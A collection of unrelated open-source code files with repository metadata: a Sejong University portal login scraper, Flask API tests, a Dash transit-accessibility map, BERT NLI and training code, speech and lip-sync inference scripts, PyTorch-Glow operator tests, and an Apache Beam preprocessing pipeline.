soup = soup.select("div.info")
if soup == []: return {"result": False}
name = soup[0].find("b").get_text().strip()
major = soup[0].find("small").get_text().strip().split(" ")[1]
return {
"result":True,
"name":name,
"id":id,
"major":major
}
def uis_api(id, pw):
uis_header = {
"Referer": "https://portal.sejong.ac.kr",
"User-Agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
}
LOGIN_INFO = {
'id': id,
'password': pw,
'rtUrl': '',
}
with requests.Session() as s:
login_req = s.post('https://portal.sejong.ac.kr/jsp/login/login_action.jsp',
headers=uis_header, data=LOGIN_INFO, timeout=TIMEOUT_SEC)
res = s.get('http://uis.sejong.ac.kr/app/sys.Login.servj', timeout=TIMEOUT_SEC)
res = s.get('http://uis.sejong.ac.kr/app/menu/sys.MenuSys.doj', timeout=TIMEOUT_SEC)
soup = bs(res.content, 'html.parser')
name = soup.select_one('form[name="MainForm"] table tr td strong')
if name is None: return {"result":False}
name = name.get_text().replace(" ", "").replace("님", "").replace("\n", "").replace("\r","")
return {
"result":True,
"name":name,
"id":id,
"major":"none"
}
if __name__ == '__main__':
id = input("학교 아이디: ")
pw = getpass.getpass("비밀번호: ")
print(dosejong_api(id,pw))
print(sjlms_api(id,pw))
print(uis_api(id, pw))
```
#### File: SIGNUS/tests/test_management.py
```python
import unittest
from json import loads
from flask import current_app
from app import create_app
from flask_jwt_extended import create_access_token
class ManagementAPITestCase(unittest.TestCase):
'''Test cases for the Management API'''
def setUp(self):
'''Set-up method'''
self.app = create_app('testing')
self.app_context = self.app.app_context()
self.app_context.push()
self.client = self.app.test_client()
self.access_token = {
'ADMIN': create_access_token(
identity=self.app.config['ADMIN_ID'],
expires_delta=False),
'TEST': create_access_token(
identity="test",
expires_delta=False)}
def tearDown(self):
'''Tear-down method'''
self.app_context.pop()
def get_headers(self, user_type="ADMIN"):
'''Builds the API request headers'''
result = {
'Accept': 'application/json',
'Authorization': "Bearer " + self.access_token[user_type],
#'Content-Type': 'application/json',
}
return result
def test_realtime(self):
'''Real-time search terms API test'''
resp = self.client.get(
'/api/signus/v1/realtime',
headers=self.get_headers(),
json={}
)
self.assertEqual(resp.status_code, 200)
def test_put_notice(self):
'''Notice creation API test'''
resp = self.client.put(
'/api/signus/v1/notice',
headers=self.get_headers(),
json={
"title": "공지사항 테스트",
"post": "공지사항 테스트"
}
)
self.assertEqual(resp.status_code, 200)
def test_patch_notice(self):
'''Notice update API test'''
# create a notice
resp = self.client.put(
'/api/signus/v1/notice',
headers=self.get_headers(),
json={
"title": "공지사항 테스트",
"post": "공지사항 테스트"
}
)
# fetch all notices
resp = self.client.get(
'/api/signus/v1/notice',
headers=self.get_headers(),
json={}
)
notices = loads(loads(resp.data)['result'])
notice_obi = notices[0]['_id']['$oid']
# update the notice
resp = self.client.patch(
'/api/signus/v1/notice/' + notice_obi,
headers=self.get_headers(),
json={
"title": "공지사항 수정 테스트",
"post": "공지사항 수정 테스트"
}
)
self.assertEqual(resp.status_code, 200)
def test_notice_many(self):
'''Notice list API test'''
resp = self.client.get(
'/api/signus/v1/notice',
headers=self.get_headers(),
json={}
)
self.assertEqual(resp.status_code, 200)
def test_notice_one(self):
'''Single notice API test'''
# create a notice
resp = self.client.put(
'/api/signus/v1/notice',
headers=self.get_headers(),
json={
"title": "공지사항 테스트",
"post": "공지사항 테스트"
}
)
# fetch all notices
resp = self.client.get(
'/api/signus/v1/notice',
headers=self.get_headers(),
json={}
)
notices = loads(loads(resp.data)['result'])
notice_obi = notices[0]['_id']['$oid']
# fetch a single notice
resp = self.client.get(
'/api/signus/v1/notice/' + notice_obi,
headers=self.get_headers(),
json={}
)
self.assertEqual(resp.status_code, 200)
def test_z_delete_notice(self):
'''Notice deletion API test'''
# create a notice
resp = self.client.put(
'/api/signus/v1/notice',
headers=self.get_headers(),
json={
"title": "공지사항 테스트",
"post": "공지사항 테스트"
}
)
# fetch all notices
resp = self.client.get(
'/api/signus/v1/notice',
headers=self.get_headers(),
json={}
)
notices = loads(loads(resp.data)['result'])
# delete the notices
for notice in notices:
resp = self.client.delete(
'/api/signus/v1/notice/' + notice['_id']['$oid'],
headers=self.get_headers(),
json={}
)
self.assertEqual(resp.status_code, 200)
``` |
{
"source": "83qmhn/transit_deprivation",
"score": 2
} |
#### File: transit_deprivation/app/app.py
```python
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output, State
from plotly import graph_objs as go
from plotly.graph_objs import *
from plotly.subplots import make_subplots
import shapefile
import numpy as np
import json
import time
import pickle
app = dash.Dash(
__name__, meta_tags=[{"name": "viewport", "content": "width=device-width"}]
)
server = app.server
# Plotly mapbox public token
mapbox_access_token = "<KEY>"
# load data
print(f"Loading data ...")
t_total_start = time.time()
# load shapefile points
t_start = time.time()
points = shapefile.Reader("data/akl_points.shp")
print(f" -- loaded shapefile with {len(points.records())} points ({time.time() - t_start:.3f} s)")
# load ploy geojson
with open("data/akl_polygons_id.geojson") as f:
t_start = time.time()
polys = json.load(f)
print(f" -- loaded polygon geojson ({time.time() - t_start:.3f} s)")
# load precomputed odt
with open("data/akl_odt.npy", 'rb') as f:
t_start = time.time()
odt = np.load(f)
print(f" -- loaded odt cube with dimensions {odt.shape} ({time.time() - t_start:.3f} s)")
# load location index
with open("data/akl_loc_idx.pkl", 'rb') as f:
t_start = time.time()
loc_idx = pickle.load(f) # mapping from DataZone2018 field to point array index
idx_loc = {v:k for k, v in loc_idx.items()} # mapping from point index to DataZone2018
print(f" -- loaded location index with dimension {len(loc_idx)} ({time.time() - t_start:.3f} s)")
# load time index
with open("data/akl_t_idx.pkl", 'rb') as f:
t_start = time.time()
t_idx = pickle.load(f)
idx_t = {v: k for k, v in t_idx.items()} # mapping from t index to travel time
print(f" -- loaded time index with dimension {len(t_idx)} ({time.time() - t_start:.3f} s)")
print(f" -- total time: {time.time() - t_total_start:.3f} s")
# extract lat lon from points
locations_lon, locations_lat = zip(*[p.points[0] for p in points.shapes()])
regions = {"auckland": (-36.8485, 174.7633)} # lat lon
# ui defaults
ui_defaults = dict(
selection_map_opacity=0.2,
selection_map_zoom=12,
route_map_opacity=1.0,
mapbox_style="carto-positron"
)
def is_valid(a):
return np.logical_not(np.isnan(a))
def travel_time_accessibility(origin, cube, limit):
options = cube[origin, ...] # vertical plane through cube
valid = is_valid(options)
# set time budget for each option
t_budget = limit # minutes
t_remain = np.zeros_like(options)
t_remain[valid] = t_budget
# travel from origin to destination
t_remain[valid] -= options[valid]
t_remain[t_remain < 0] = 0
# data dims
n_loc, n_t = t_remain.shape
# mean eta for each location with at least one route that meets the constraints
valid_loc = np.max(t_remain, axis=-1) > 0
etas = np.nanmean(options[valid_loc], axis=-1)
acc_idx = [i for i, v in enumerate(valid_loc) if v]
# proportion of time each destination is accessible from this location within the time limit
acc_t_by_loc = np.nansum(t_remain[acc_idx] > 0, axis=1) / n_t
return acc_idx, etas, acc_t_by_loc
def selection_map(relayoutData):
opacity = ui_defaults["selection_map_opacity"]
locations = [f["id"] for f in polys["features"]]
values = [0.75] * len(locations)
try:
lat = (relayoutData['mapbox.center']['lat'])
lon = (relayoutData['mapbox.center']['lon'])
zoom = (relayoutData['mapbox.zoom'])
except:
lat, lon = regions["auckland"]
zoom=ui_defaults["selection_map_zoom"]
data = [
Choroplethmapbox(
geojson=polys,
featureidkey="id",
locations=locations,
z=values,
colorscale="Greys",
showscale=False,
marker=dict(opacity=opacity, line=dict(width=0.1)),
),
]
layout = dict(
mapbox=dict(
layers=[],
accesstoken=mapbox_access_token,
center=dict(lat=lat, lon=lon),
zoom=zoom,
style=ui_defaults["mapbox_style"]
),
hovermode="closest",
margin=dict(r=0, l=0, t=0, b=0),
dragmode="pan",
clickmode="event+select"
)
return dict(data=data, layout=layout)
def route_map(origin_idx, locations, values, opacity, relayoutData):
try:
lat = (relayoutData['mapbox.center']['lat'])
lon = (relayoutData['mapbox.center']['lon'])
zoom = (relayoutData['mapbox.zoom'])
except:
lat, lon = locations_lat[origin_idx], locations_lon[origin_idx]
zoom = ui_defaults["selection_map_zoom"]
locations = [idx_loc[l] for l in locations]
data = [
Choroplethmapbox(
geojson=polys,
featureidkey="id",
locations=locations,
z=values,
colorscale="Viridis",
showscale=True,
colorbar=dict(
title="Mean ETA",
xpad=15,
yanchor="middle",
y=0.775,
tickmode="linear",
dtick=10,
tick0=0,
tickfont=dict(color="#000000"),
titlefont=dict(color="#000000"),
thicknessmode="pixels",
len=0.4
),
marker=dict(opacity=opacity, line=dict(width=0.0)),
),
]
layout = dict(
mapbox=dict(
layers=[],
accesstoken=mapbox_access_token,
center=dict(lat=lat, lon=lon),
zoom=zoom,
style=ui_defaults["mapbox_style"]
),
hovermode="closest",
margin=dict(r=0, l=0, t=0, b=0),
dragmode="pan",
clickmode="event",
autosize=True
)
return dict(data=data, layout=layout)
# Layout of Dash App
app.layout = html.Div(
children=[
html.Div(
className="row",
children=[
# Column for user controls
html.Div(
className="four columns div-user-controls",
children=[
html.Img(className="logo", src=app.get_asset_url("dash-logo-new.png")),
html.H2("Transit & Deprivation"),
html.P("Select a starting location from the map"),
html.P(id="selected-point"),
html.Div(
id="time-limit-slider-container",
children=[
html.P(
id="time-limit-slider-text",
children="Drag the slider to change the available travel time in minutes",
),
dcc.Slider(
id="time-limit-slider",
min=1,
max=240,
step=1,
value=60,
marks={
str(t): {
"label": str(t),
"style": {"color": "#7fafdf"},
}
for t in [1, 60, 120, 180, 240]
},
updatemode='mouseup',
),
html.Div(
style={"margin-top": 10},
children=[
html.P(id="time-limit-value")
]
),
],
),
],
),
html.Div(
id="plot-container",
className="eight columns div-for-charts bg-grey",
children=[
dcc.Loading(
type="default",
children=[
html.Div(
id="map-container",
children=[
dcc.Graph(
id="map-graph",
className="single-plot",
figure=selection_map(None)
),
]
),
]
),
],
)
],
)
]
)
# callbacks should be defined after app.layout
@app.callback(
Output("time-limit-value", "children"), [Input("time-limit-slider", "value")]
)
def update_time_limit_value(value):
value_text = f"Available time: {value} minutes"
return value_text
@app.callback(
Output("map-graph", "selectedData"), [Input("map-container", "n_clicks")]
)
def reset_selectedData(n_clicks):
return None
@app.callback(
[
Output("selected-point", "children"),
Output("map-graph", "figure"),
],
[
Input("map-graph", "selectedData"),
Input("time-limit-slider", "value"),
],
[
State("map-graph", "relayoutData")
]
)
def select_point(selectedData, time_limit, relayoutData):
if selectedData:
origin = selectedData["points"][0]["location"]
origin_idx = loc_idx[origin]
locations, values, opacity = travel_time_accessibility(origin_idx, odt, time_limit)
figure = go.Figure(route_map(origin_idx, locations, values, opacity, relayoutData))
selected_text = f"Selected location: {origin}"
else:
figure = go.Figure(selection_map(relayoutData))
selected_text = f"Selected location: None"
return selected_text, figure
if __name__ == "__main__":
app.run_server(host="0.0.0.0", debug=True)
``` |
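For completeness, a sketch of how the app above is usually launched during development; the explicit port is an assumption (8050 is Dash's default) rather than something the file itself sets.
```python
# hypothetical development launch with an explicit port
app.run_server(host="0.0.0.0", port=8050, debug=True)
# then browse to http://localhost:8050
```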
{
"source": "83r7y/torch-berty",
"score": 2
} |
#### File: pytorch_berty/models/bert_klue_nli.py
```python
import numpy as np
import torch
from torch import optim
from transformers import BertTokenizer, BertModel, BertConfig
from ..core import BaseModel
class BertKlueNli(torch.nn.Module, BaseModel):
def __init__(self, config, dataset):
super(BertKlueNli, self).__init__()
self.config = config
self.dataset = dataset
self.num_classes = len(set(self.dataset.klue_nli_ds['train']['label']))
self.bert_cfg = BertConfig.from_pretrained('klue/bert-base')
self.bert = BertModel.from_pretrained('klue/bert-base')
self.tk = BertTokenizer.from_pretrained('klue/bert-base', config=self.bert_cfg)
self.logit_fc = torch.nn.Linear(self.bert_cfg.hidden_size, self.num_classes)
self.loss = torch.nn.CrossEntropyLoss()
if 'model_ckpt' in self.config:
ckpt = torch.load(self.config['model_ckpt'])
self.load_state_dict(ckpt['state_dict'])
self.eval()
def forward(self, batch:dict):
batch = self.preprocess(batch)
bert_out = self.bert(input_ids=batch['input_ids'],
token_type_ids=batch['token_type_ids'],
attention_mask=batch['attention_mask'])
pooled_out = bert_out['pooler_output']
logits = self.logit_fc(pooled_out)
return logits
def preprocess(self, batch:dict):
# get device of model
device = next(self.parameters()).device
if 'label' in batch:
batch['label'] = batch['label'].to(device)
# tokenize sentences
tk_res = self.tk(text=batch['premise'], text_pair=batch['hypothesis'],
padding=True, return_tensors='pt',
max_length=self.bert_cfg.max_position_embeddings)
for key in tk_res:
batch[key] = tk_res[key].to(device)
return batch
def predict(self, premise:str, hypothesis:str):
# wrap the sentence pair as a single-example batch; preprocess() expects 'premise' and 'hypothesis' keys
batch = dict(premise=[premise],
hypothesis=[hypothesis])
logits = self.forward(batch)
# NLI classification logits over the dataset's label set
return logits
def training_step(self, batch:dict, batch_idx:int, opt_idx:int):
logits = self.forward(batch)
loss = self.loss(logits, batch['label'])
return loss
def validation_step(self, batch:dict, batch_idx:int):
logits = self.forward(batch)
loss = self.loss(logits, batch['label'])
return loss
def test_step(self, batch:dict, batch_idx:int):
logits = self.forward(batch)
loss = self.loss(logits, batch['label'])
return loss
def configure_optimizers(self):
opt = optim.Adam(self.parameters(), lr=self.config['trainer']['learning_rate'])
scheduler = optim.lr_scheduler.ExponentialLR(opt, 0.9)
return [opt], [scheduler]
```
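A minimal inference sketch, assuming a dataset object exposing `klue_nli_ds` and a config dict with the keys referenced above are available; the variable names and config values are placeholders, not values from the repository.
```python
# hypothetical inference call; my_dataset must expose klue_nli_ds['train']['label']
config = {"trainer": {"learning_rate": 3e-5}}            # add "model_ckpt": "path/to.ckpt" to load weights
model = BertKlueNli(config, my_dataset)
logits = model.predict(premise_text, hypothesis_text)    # raw logits; argmax gives the NLI label index
```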
#### File: torch-berty/pytorch_berty/trainer.py
```python
import random
import os
import argparse
import json
from pathlib import Path
from tqdm import tqdm
import torch
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.data.distributed import DistributedSampler
import torch.multiprocessing as mp
import torch.distributed as dist
from torch.utils.data import DataLoader
import numpy as np
from .core import BaseModel, BaseDataset
def training_prologue():
parser = argparse.ArgumentParser()
parser.add_argument('--cfg-path', required=True, help='path of config file')
args = parser.parse_args()
# load config
with open(args.cfg_path) as fp:
str_cfg = fp.read()
config = json.loads(str_cfg)
# set seed
torch.manual_seed(config['trainer']['seed'])
np.random.seed(config['trainer']['seed'])
random.seed(config['trainer']['seed'])
return config, parser
def make_output_dir(config, arg_parser):
args = arg_parser.parse_args()
# set output directory
# check if output dir exists
dir_idx = 0
while True:
try:
path = Path('%s/output_%d' % (config['output_dir'], dir_idx))
path.mkdir(parents=True, exist_ok=False)
break
except FileExistsError as err:
dir_idx += 1
config['output_dir'] = '%s/output_%d' % (config['output_dir'], dir_idx)
# copy config file
with open('%s/%s' % (config['output_dir'],
os.path.basename(args.cfg_path)), 'w') as fp:
fp.write(json.dumps(config, indent=4, ensure_ascii=False))
class Trainer:
def __init__(self, config, model, dataset):
self.config = config
self.model = model
self.dataset = dataset
def init_process(self, rank, size, fn, backend='nccl'):
cfg = self.config
os.environ['MASTER_ADDR'] = cfg['trainer']['master_addr']
os.environ['MASTER_PORT'] = cfg['trainer']['master_port']
print('rank: %d, size: %d' % (rank,size))
fn(rank, size)
def fit(self):
cfg = self.config
if cfg['trainer']['n_gpus'] > 1:
processes = list()
# distribute
for rank in range(cfg['trainer']['n_gpus']):
p = mp.Process(target=self.init_process,
args=(rank,
cfg['trainer']['n_gpus'],
self._run))
p.start()
processes.append(p)
for p in processes:
p.join()
else:
# single gpu or cpu training
self._run()
def average_gradients(self, model):
world_size = dist.get_world_size()
for param in model.parameters():
if param.grad is not None:
dist.all_reduce(param.grad, op=dist.ReduceOp.SUM) # ReduceOp replaces the deprecated reduce_op alias
param.grad /= world_size
def _run(self, rank=None, size=None):
cfg = self.config
# check if dist training
dist_train = rank is not None and size is not None
if dist_train:
torch.cuda.set_device(rank)
device = torch.device('cuda', rank)
dist.init_process_group(backend='nccl',
init_method='env://',
world_size=size,
rank=rank)
else:
if cfg['trainer']['n_gpus'] == 0:
device = torch.device('cpu')
else:
# single gpu
device = torch.device('cuda', 0)
torch.manual_seed(cfg['trainer']['seed'])
np.random.seed(cfg['trainer']['seed'])
random.seed(cfg['trainer']['seed'])
if dist_train:
self.model.to(device)
ddp_model = DDP(self.model, device_ids=[rank], output_device=rank, find_unused_parameters=True)
model = ddp_model.module
train_dataset = self.dataset.dataset['train']
train_sampler = DistributedSampler(train_dataset)
train_data = DataLoader(train_dataset, sampler=train_sampler, batch_size=cfg['batch_size'])
else:
# get optimizer
self.model.to(device)
model = self.model
train_data = self.dataset.train
valid_data = self.dataset.valid
optimizers, schedulers = self.model.configure_optimizers()
# resume checkpoint
cnt_epoch = 0
if cfg['trainer']['resume_from_checkpoint']:
ckpt = torch.load(cfg['trainer']['resume_from_checkpoint'], map_location=device)
cnt_epoch = ckpt['epoch']
model.load_state_dict(ckpt['state_dict'])
for opt, opt_state, sch, sch_state in\
zip(optimizers, ckpt['optimizer_states'], schedulers, ckpt['lr_schedulers']):
opt.load_state_dict(opt_state)
if sch is not None:
sch.load_state_dict(sch_state)
best_loss = np.inf
for epoch in range(cnt_epoch, cfg['trainer']['max_epochs']):
model.train()
tqdm_ins = tqdm(train_data,
disable=(dist_train and rank != 0),
ascii=True,
desc='epoch: %d' % epoch)
for batch_idx, batch in enumerate(tqdm_ins):
for opt_idx, optimizer in zip(range(len(optimizers)), optimizers):
optimizer.zero_grad()
# training step
loss = model.training_step(batch, batch_idx, opt_idx)
tqdm_ins.set_postfix({'train_loss': '%7.4f' % loss})
loss.backward()
if dist_train:
self.average_gradients(model)
optimizer.step()
if dist_train:
dist.barrier()
if schedulers is not None:
for scheduler in schedulers:
scheduler.step()
model.eval()
if rank == 0 or not dist_train:
# compute avg loss
tot_loss = list()
for batch_idx, batch in enumerate(tqdm(valid_data, disable=(dist_train and rank != 0))):
loss = model.validation_step(batch, batch_idx)
tot_loss.append(loss.item())
avg_loss = np.mean(np.array(tot_loss))
# save best checkpoint
if best_loss > avg_loss:
# save
save_dict = dict(
epoch=epoch,
optimizer_states=[optimizer.state_dict() for optimizer in optimizers],
state_dict = model.state_dict()
)
if schedulers is not None:
save_dict['lr_schedulers']=[scheduler.state_dict() for scheduler in schedulers]
model.save_user_specific_data(save_dict)
torch.save(save_dict, '%s/epoch=%02d-val_loss=%8.6f.ckpt' % (self.config['output_dir'],
epoch, avg_loss))
best_loss = avg_loss
print('%dth epoch, average validation loss: %7.4f, best_loss: %7.4f' %\
(epoch, avg_loss, best_loss))
if dist_train:
dist.barrier()
```
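A sketch of how the pieces above are typically combined into a training entry point; the model and dataset classes and the config layout are assumptions based only on what the Trainer reads (trainer.seed, trainer.n_gpus, batch_size, output_dir, and so on).
```python
# hypothetical entry point; MyModel/MyDataset stand in for project-specific classes
if __name__ == '__main__':
    config, parser = training_prologue()      # parses --cfg-path and seeds the RNGs
    make_output_dir(config, parser)           # creates output_N/ and copies the config there
    dataset = MyDataset(config)               # must expose .train / .valid loaders as used above
    model = MyModel(config, dataset)          # must implement the *_step and optimizer hooks
    Trainer(config, model, dataset).fit()
```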
#### File: run/infer_fastspeech2/run.py
```python
import argparse
import json
import os
import random
import math
import numpy as np
import torch
from pytorch_berty.models.fastspeech2 import FastSpeech2
from pytorch_berty.utils.korean import KOR_SYMBOLS
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--cfg-path', required=True, help='path of config file')
args = parser.parse_args()
# load config
with open(args.cfg_path) as fp:
str_cfg = fp.read()
config = json.loads(str_cfg)
fastspeech2_model = FastSpeech2(config=config, dataset=None, symbols=KOR_SYMBOLS)
mel = fastspeech2_model.predict('안녕하세요')
if __name__ == '__main__':
main()
```
#### File: run/infer_wav2lip/run.py
```python
import argparse
import json
import os
import random
import math
import numpy as np
import torch
from pytorch_berty.models.conv_face_detection import ConvFaceDetection
from pytorch_berty.models.conv_wav2lip import ConvWav2Lip
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--cfg-path', required=True, help='path of config file')
args = parser.parse_args()
# load config
with open(args.cfg_path) as fp:
str_cfg = fp.read()
config = json.loads(str_cfg)
# init face detection model
# load model of https://www.adrianbulat.com/downloads/python-fan/s3fd-619a316812.pth
face_detection_model = ConvFaceDetection(config, None, config['face_detection_ckpt']).to(config['device'])
wav2lip_model = ConvWav2Lip(config, None, face_detection_model, config['wav2lip_ckpt']).to(config['device'])
video_bin = wav2lip_model.predict(config['video_path'], config['audio_path'])
with open(config['output_path'], 'wb') as fp:
fp.write(video_bin)
if __name__ == '__main__':
main()
``` |
{
"source": "840017951/test01",
"score": 3
} |
#### File: 840017951/test01/login.py
```python
from flask import Flask
app = Flask(__name__)
@app.route('/login', methods=['GET', 'POST'])
def login():
num1 = 10
num2 = 200
num3 = 30
return 'login page'
if __name__ == '__main__':
app.run()
``` |
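A quick way to exercise the route without starting the server, using Flask's built-in test client; this is only a sketch and relies on the corrected `__main__` guard above.
```python
# expected output: 200 b'login page'
with app.test_client() as client:
    resp = client.get('/login')
    print(resp.status_code, resp.data)
```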
{
"source": "842974287/glow",
"score": 2
} |
#### File: tests/nodes/gelu_test.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import torch
import torch.nn.functional as F
from tests.utils import jitVsGlow
class TestGelu(unittest.TestCase):
def test_gelu_basic(self):
"""Basic test of the PyTorch gelu Node on Glow."""
def test_f(a):
return F.gelu(a + a)
for i in range(100):
x = torch.randn(10)
jitVsGlow(
test_f,
x,
check_trace=False,
atol=1e-3,
expected_fused_ops={"aten::gelu"},
)
```
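These are ordinary unittest cases, so a single module can be run on its own; the dotted module path below is an assumption based on the `tests.utils` import above.
```python
# hypothetical direct run of this test module
import unittest
unittest.main(module="tests.nodes.gelu_test", exit=False, verbosity=2)
# or from a shell: python -m unittest tests.nodes.gelu_test -v
```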
#### File: tests/nodes/matmul_test.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import random
import unittest
import torch
from tests.utils import jitVsGlow
class TestMatMul(unittest.TestCase):
def test_matmul_1d_1d(self):
"""Test of aten::matmul with two 1d inputs Glow."""
def test_f(a, b):
return a.matmul(b + b)
x = torch.randn(4)
y = torch.randn(4)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::matmul"})
def test_matmul_2d_1d(self):
"""Test of aten::matmul with 2d and 1d inputs Glow."""
def test_f(a, b):
return a.matmul(b + b)
x = torch.randn(9, 4)
y = torch.randn(4)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::matmul"})
def test_matmul_3d_1d(self):
"""Test of aten::matmul with 2d and 1d inputs Glow."""
def test_f(a, b):
return a.matmul(b + b)
x = torch.randn(6, 9, 4)
y = torch.randn(4)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::matmul"})
def test_matmul_4d_1d(self):
"""Test of aten::matmul with 2d and 1d inputs Glow."""
def test_f(a, b):
return a.matmul(b + b)
x = torch.randn(2, 6, 9, 4)
y = torch.randn(4)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::matmul"})
def test_matmul_1d_2d(self):
"""Test of aten::matmul with 1d and 2d inputs Glow."""
def test_f(a, b):
return a.matmul(b + b)
x = torch.randn(4)
y = torch.randn(4, 9)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::matmul"})
def test_matmul_1d_3d(self):
"""Test of aten::matmul with 1d and 2d inputs Glow."""
def test_f(a, b):
return a.matmul(b + b)
x = torch.randn(4)
y = torch.randn(3, 4, 9)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::matmul"})
def test_matmul_1d_4d(self):
"""Test of aten::matmul with 1d and 2d inputs Glow."""
def test_f(a, b):
return a.matmul(b + b)
x = torch.randn(4)
y = torch.randn(5, 3, 4, 9)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::matmul"})
def test_matmul_nd_nd(self):
"""Test of aten::matmul with >2d and >2d inputs Glow."""
def test_f(a, b):
return a.matmul(b + b)
def do_test(lhsDims, rhsDims):
lhs = torch.randn(lhsDims)
rhs = torch.randn(rhsDims)
jitVsGlow(test_f, lhs, rhs, expected_fused_ops={"aten::matmul"})
def randomDimsOfRank(rank):
dims = []
for i in range(rank):
dim = random.randint(2, 9)
dims.append(dim)
return dims
# Dimensions of base tensors that lhs and rhs will be built from
lhsBase = [3, 4]
rhsBase = [4, 2]
for additional_dims in range(3):
extension = randomDimsOfRank(additional_dims)
do_test(extension + lhsBase, rhsBase)
do_test([1] + extension + lhsBase, rhsBase)
do_test(extension + [1] + lhsBase, rhsBase)
do_test(lhsBase, extension + rhsBase)
do_test(lhsBase, [1] + extension + rhsBase)
do_test(lhsBase, extension + [1] + rhsBase)
do_test(extension + lhsBase, extension + rhsBase)
```
#### File: tests/nodes/sub_test.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import torch
from tests.utils import jitVsGlow
class TestSub(unittest.TestCase):
def test_sub_basic(self):
"""Basic test of the PyTorch sub Node on Glow."""
def test_f(a, b):
c = a.sub(b)
return c.sub(c)
x = torch.randn(4)
y = torch.randn(4)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::sub"})
def test_sub_broadcast_1(self):
"""Test of the PyTorch sub Node on Glow with broadcasting."""
def test_f(a, b):
c = a.sub(b)
return c.sub(c)
x = torch.randn(8, 3, 4, 2)
y = torch.randn(4, 2)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::sub"})
def test_sub_broadcast_2(self):
"""Test of the PyTorch sub Node on Glow with broadcasting."""
def test_f(a, b):
c = a.sub(b)
return c.sub(c)
x = torch.randn(8, 3, 4, 2)
y = torch.randn(1, 2)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::sub"})
def test_sub_broadcast_3(self):
"""Test of the PyTorch sub Node on Glow with broadcasting."""
def test_f(a, b):
c = a.sub(b)
return c.sub(c)
x = torch.randn(4, 2)
y = torch.randn(8, 3, 4, 2)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::sub"})
def test_sub_float(self):
"""Test of the PyTorch aten::sub Node with a float argument"""
def test_f(a):
return (a * a).sub(3.9)
x = torch.randn(4)
jitVsGlow(test_f, x, expected_fused_ops={"aten::sub"})
def test_sub_int(self):
"""Test of the PyTorch aten::sub Node with an int argument"""
def test_f(a):
return (a * a).sub(20)
x = torch.randn(4)
jitVsGlow(test_f, x, expected_fused_ops={"aten::sub"})
```
#### File: tests/nodes/typeas_test.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import torch
from tests.utils import jitVsGlow
class TestTypeAs(unittest.TestCase):
def test_typeas_basic(self):
"""Basic test of the PyTorch type_as Node on Glow (float to int32)."""
def test_f(a, b):
c = a.type_as(b)
return c + c
x = torch.randn(4)
y = torch.zeros(4, dtype=torch.int32)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::type_as"})
def test_typeas_basic2(self):
"""Basic test of the PyTorch type_as Node on Glow (int32 to float)."""
def test_f(a, b):
c = a.type_as(b)
return c + c
x = torch.randn(4).to(dtype=torch.int32)
y = torch.randn(4)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::type_as"})
def test_typeas_bool(self):
"""Test of the PyTorch type_as Node on Glow converting bool to float."""
def test_f(a, b):
c = a.type_as(b)
return c + c
x = torch.randn(4).to(dtype=torch.bool)
y = torch.randn(4)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::type_as"})
def test_typeas_self(self):
"""Test of the PyTorch mul Node on Glow doing empty convert (float to float)."""
def test_f(a, b):
a = a + a
c = a.type_as(b)
return c + c
x = torch.randn(4)
y = x
jitVsGlow(test_f, x, y, expected_fused_ops={})
def test_typeas_self_f2f2(self):
"""Test of the PyTorch type_as Node on Glow float to float."""
def test_f(a, b):
a = a + a
c = a.type_as(b)
return c + c
x = torch.randn(4, 2)
y = torch.randn(8, 3, 4, 2)
jitVsGlow(test_f, x, y, expected_fused_ops={})
def test_typeas_self_f2i2(self):
"""Test of the PyTorch type_as Node on Glow with float to int32"""
def test_f(a, b):
a = a + a
c = a.type_as(b)
return c + c
x = torch.randn(4, 2)
y = torch.randn(8, 3, 4, 2).to(dtype=torch.int32)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::type_as"})
``` |
{
"source": "843098306/ETL-Data-Pipeline",
"score": 2
} |
#### File: 843098306/ETL-Data-Pipeline/datatype_reference.py
```python
from __future__ import absolute_import
from __future__ import print_function
import h5py
import argparse
import logging
import re
import numpy as np
import pandas as pd
import os
import apache_beam as beam
from apache_beam.io import ReadFromText
from apache_beam.io import WriteToText
from apache_beam.metrics import Metrics
from apache_beam.metrics.metric import MetricsFilter
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.options.pipeline_options import SetupOptions
import tensorflow as tf
import tensorflow_transform as tft
import tensorflow_transform.beam as tft_beam
import keras
from keras import models, layers
from kerastuner import HyperModel
from kerastuner.tuners import Hyperband
from sklearn import preprocessing
def isfloat(value):
try:
float(value)
return True
except ValueError:
return False
class Split(beam.DoFn):
def process(self, element, header_array):
Feature_list_raw = element.split(",")
Feature_list = []
# Edge case
# i = 0
# while(i < len(Feature_list_raw)):
# if(i == 2):
# Feature_list.append(str(Feature_list_raw[i] + Feature_list_raw[i + 1]))
# i += 2
# else:
# Feature_list.append(Feature_list_raw[i])
# i += 1
Output = {}
for j in range(len(header_array)):
if(Feature_list_raw[j] == "" or Feature_list_raw[j] == " "):
Output[header_array[j]] = "?"
else:
Output[header_array[j]] = Feature_list_raw[j]
return [Output]
class Collect(beam.DoFn):
def process(self, element):
# Returns a list of tuples containing feature, feature values and feature type
result = []
for feature in element:
if(isfloat(element[feature])):
result.append((feature,element[feature],'Numeric'))
elif(element[feature] != "?"):
result.append((feature,element[feature],'String'))
return result
